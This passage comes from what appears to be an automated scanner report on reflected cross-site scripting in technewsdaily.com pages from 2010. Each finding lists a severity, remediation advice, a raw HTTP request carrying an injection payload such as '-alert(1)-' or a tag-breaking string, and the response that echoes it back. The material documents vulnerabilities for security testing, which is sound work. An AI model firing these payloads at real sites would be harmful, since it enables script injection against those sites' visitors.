User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62412

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
t/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/?17356'-alert(1)-'a171853f259=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.29. http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /blackberry-playbook-tablet-to-launch-in-march-2011-1828/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6788"><a>a0306c745ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blackberry-playbook-tablet-to-launch-in-march-2011-1828/?d6788"><a>a0306c745ca=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62774

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/?d6788"><a>a0306c745ca=1/" />
...[SNIP]...

1.30. http://www.technewsdaily.com/blinded-satellite-gains-ground-in-radio-interference-battle--1420/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /blinded-satellite-gains-ground-in-radio-interference-battle--1420/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e381c'-alert(1)-'f9be0c8bd02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blinded-satellite-gains-ground-in-radio-interference-battle--1420e381c'-alert(1)-'f9be0c8bd02/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40528

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/blinded-satellite-gains-ground-in-radio-interference-battle--1420e381c'-alert(1)-'f9be0c8bd02/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.31. http://www.technewsdaily.com/blinded-satellite-gains-ground-in-radio-interference-battle--1420/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /blinded-satellite-gains-ground-in-radio-interference-battle--1420/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b478c'-alert(1)-'178437e97d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blinded-satellite-gains-ground-in-radio-interference-battle--1420/?b478c'-alert(1)-'178437e97d6=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 67395

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
pt">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/blinded-satellite-gains-ground-in-radio-interference-battle--1420/?b478c'-alert(1)-'178437e97d6=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.32. http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /change-of-heart-restore-deleted-gmail-contacts-1818/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6cdc'-alert(1)-'6c6946204be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /change-of-heart-restore-deleted-gmail-contacts-1818b6cdc'-alert(1)-'6c6946204be/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40500

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
e="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818b6cdc'-alert(1)-'6c6946204be/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.33. http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /change-of-heart-restore-deleted-gmail-contacts-1818/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe6f"><a>0af34d1e8c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /change-of-heart-restore-deleted-gmail-contacts-1818/?dbe6f"><a>0af34d1e8c8=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63413

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/?dbe6f"><a>0af34d1e8c8=1/" />
...[SNIP]...

1.34. http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /change-of-heart-restore-deleted-gmail-contacts-1818/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ba9'-alert(1)-'8a6eb7eb832 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /change-of-heart-restore-deleted-gmail-contacts-1818/?74ba9'-alert(1)-'8a6eb7eb832=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
"text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/?74ba9'-alert(1)-'8a6eb7eb832=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.35. http://www.technewsdaily.com/contact-us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /contact-us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b1a3'-alert(1)-'27bdaf75049 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact-us3b1a3'-alert(1)-'27bdaf75049/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40418

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/contact-us3b1a3'-alert(1)-'27bdaf75049/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.36. http://www.technewsdaily.com/contact-us/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /contact-us/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19cc9'-alert(1)-'3473b765ee5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact-us/?19cc9'-alert(1)-'3473b765ee5=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/contact-us/?19cc9'-alert(1)-'3473b765ee5=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.37. http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /creative-releases-7-inch-android-tablet-for-270-1835/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b6ce'-alert(1)-'c1a22d88950 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /creative-releases-7-inch-android-tablet-for-270-18354b6ce'-alert(1)-'c1a22d88950/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40502

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-18354b6ce'-alert(1)-'c1a22d88950/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.38. http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /creative-releases-7-inch-android-tablet-for-270-1835/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfbc'-alert(1)-'df45b9d77de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /creative-releases-7-inch-android-tablet-for-270-1835/?5dfbc'-alert(1)-'df45b9d77de=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:51:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:51:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61698

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/?5dfbc'-alert(1)-'df45b9d77de=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.39. http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /creative-releases-7-inch-android-tablet-for-270-1835/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12533"><a>fe2216afc2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /creative-releases-7-inch-android-tablet-for-270-1835/?12533"><a>fe2216afc2c=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:51:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:51:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62060

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/?12533"><a>fe2216afc2c=1/" />
...[SNIP]...

1.40. http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /delicious-not-shutting-down-no-reason-to-panic-1834/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edce3'-alert(1)-'6af313e49d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delicious-not-shutting-down-no-reason-to-panic-1834edce3'-alert(1)-'6af313e49d1/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:11 GMT
Server: Apache/2.2.3 (Red Hat)
